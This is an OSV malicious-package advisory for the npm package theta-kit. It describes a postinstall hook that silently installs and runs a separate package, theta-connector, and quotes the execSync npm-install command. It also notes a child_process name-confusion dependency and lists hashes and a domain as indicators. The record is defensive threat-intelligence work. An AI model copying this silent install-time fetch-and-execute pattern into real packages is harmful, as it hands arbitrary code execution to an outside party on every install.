MAL-2026-5706

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/theta-kit/MAL-2026-5706.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5706
Aliases
  • GHSA-ccpw-cfwc-qgw4
Published
2026-06-12T19:07:23Z
Modified
2026-07-06T20:01:55.609885114Z
Summary
Malicious code in theta-kit (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (09b0737ff5b0b0768e2314b014529b80609632a38dfdc3a9ad6cfd6ab1da9039)

package.json declares postinstall: node dist/index.js, and dist/index.js executes Model.resetor() at module top level — meaning both npm install theta-kit and require('theta-kit') hand control to a separate package, 'theta-connector'. resetor() instantiates new ThetaConnector({}) and calls db.queryDBConnect(). If 'theta-connector' is not present, the catch branch silently runs execSync('npm install theta-connector --no-warnings --no-save --no-progress --loglevel silent') and then requires and executes it. The package that ultimately runs is not shipped in this tarball, so its bytes can change at any time without any update to theta-kit. Output is suppressed and errors are swallowed, hiding the fetch-and-execute from the installer. The package also declares a runtime dependency on child_process@^1.0.2, an unrelated registry placeholder sharing a name with Node's built-in module — a confusion pattern that adds a second installer-controlled execution surface. The install-time fetch-and-execute pattern, combined with the silent-self-install fallback and the unrelated 'child_process' registry dep, is unrelated to the package's advertised mobx in-memory DB purpose and gives the maintainer of 'theta-connector' arbitrary code execution on every install or require of theta-kit.

Source: ghsa-malware (da0964ff798940752e30878dc90ffb51aca217020a2da059bc8834f95963cbac)

Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Database specific
{
    "malicious-packages-origins": [
        {
            "source": "amazon-inspector",
            "sha256": "09b0737ff5b0b0768e2314b014529b80609632a38dfdc3a9ad6cfd6ab1da9039",
            "modified_time": "2026-06-12T19:07:23Z",
            "import_time": "2026-06-12T19:43:58.28824843Z",
            "id": "IN-MAL-2026-006013",
            "versions": [
                "1.0.1"
            ]
        },
        {
            "source": "amazon-inspector",
            "sha256": "30f04104c9e5de8a18da769a2aa50e78546b12ccaf99d7c442aae79277c6e098",
            "modified_time": "2026-06-12T19:07:30Z",
            "import_time": "2026-06-12T19:43:59.614743083Z",
            "id": "IN-MAL-2026-006026",
            "versions": [
                "1.0.2"
            ]
        },
        {
            "source": "amazon-inspector",
            "sha256": "4f2b7b976965370ad873f7410cd353a71da0cdbe5d86dcf23a537dab34b98959",
            "modified_time": "2026-06-12T19:07:23Z",
            "import_time": "2026-06-12T19:43:58.383946386Z",
            "id": "IN-MAL-2026-006014",
            "versions": [
                "1.0.2"
            ]
        },
        {
            "source": "amazon-inspector",
            "sha256": "8e4af06adb727e8855bb93b3d39906e1aa504a697641cfecad7fbf51dd8e024b",
            "modified_time": "2026-06-12T19:07:28Z",
            "import_time": "2026-06-12T19:43:59.125647099Z",
            "id": "IN-MAL-2026-006021",
            "versions": [
                "1.0.3"
            ]
        },
        {
            "source": "amazon-inspector",
            "sha256": "eaf5ecef46a2c9c55015a7ce1b2cbd6fbe4cc2305fb2113c4889b11b26a7231e",
            "modified_time": "2026-06-12T19:07:24Z",
            "import_time": "2026-06-12T19:43:58.474297344Z",
            "id": "IN-MAL-2026-006015",
            "versions": [
                "1.0.3"
            ]
        },
        {
            "source": "amazon-inspector",
            "sha256": "f7f4a3e8761d93c4408de9acaf0eee18f4f0146cbef2638669054a4c19beae4b",
            "modified_time": "2026-06-12T19:07:30Z",
            "import_time": "2026-06-12T19:43:59.518972894Z",
            "id": "IN-MAL-2026-006025",
            "versions": [
                "1.0.0"
            ]
        },
        {
            "source": "ghsa-malware",
            "sha256": "da0964ff798940752e30878dc90ffb51aca217020a2da059bc8834f95963cbac",
            "modified_time": "2026-07-06T18:58:37Z",
            "import_time": "2026-07-06T19:53:47.946650158Z",
            "id": "GHSA-ccpw-cfwc-qgw4",
            "versions": [
                "1.0.3",
                "1.0.2",
                "1.0.1",
                "1.0.0"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / theta-kit

Package

Affected ranges

Affected versions

1.*
1.0.0
1.0.1
1.0.2
1.0.3

Database specific

source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/theta-kit/MAL-2026-5706.json"
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code"
    }
]
indicators
{
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-C+vATK2qDgKPt43RK++IyMu9ZdZLkumQPMGNg2Sn9vDKl6OWneAvYuUnVMfQycQ+wiXvISUAlf9k9ntIARYa0w==",
                "sha1": "ec7b42baff2dc6f80aeb61a06acc441c623ab424"
            },
            "filename": "theta-kit-1.0.1.tgz"
        }
    ],
    "domains": [
        "jsonkeeper.com"
    ],
    "evidence_files": [
        {
            "path": "dist/index.js",
            "sha256": "ec98be3eb73bdfb0ce354bc9e67695a0fc4226daf033c0ee79094ff2be9b1594",
            "tlsh": "1342138937fb2530456b30691e0f8107b63a944ba91dee4c7a9c42d4af4847e52f3bf9"
        },
        {
            "path": "package.json",
            "sha256": "741de36417f1e820c5f37ff6860b1e21ca9715b3ea554acc262bf2784fb9c9b6",
            "tlsh": "4a018930ca258eb356d421d55cab05a35e729867095abc0833c7830c0b8e2bb50fe67d"
        }
    ]
}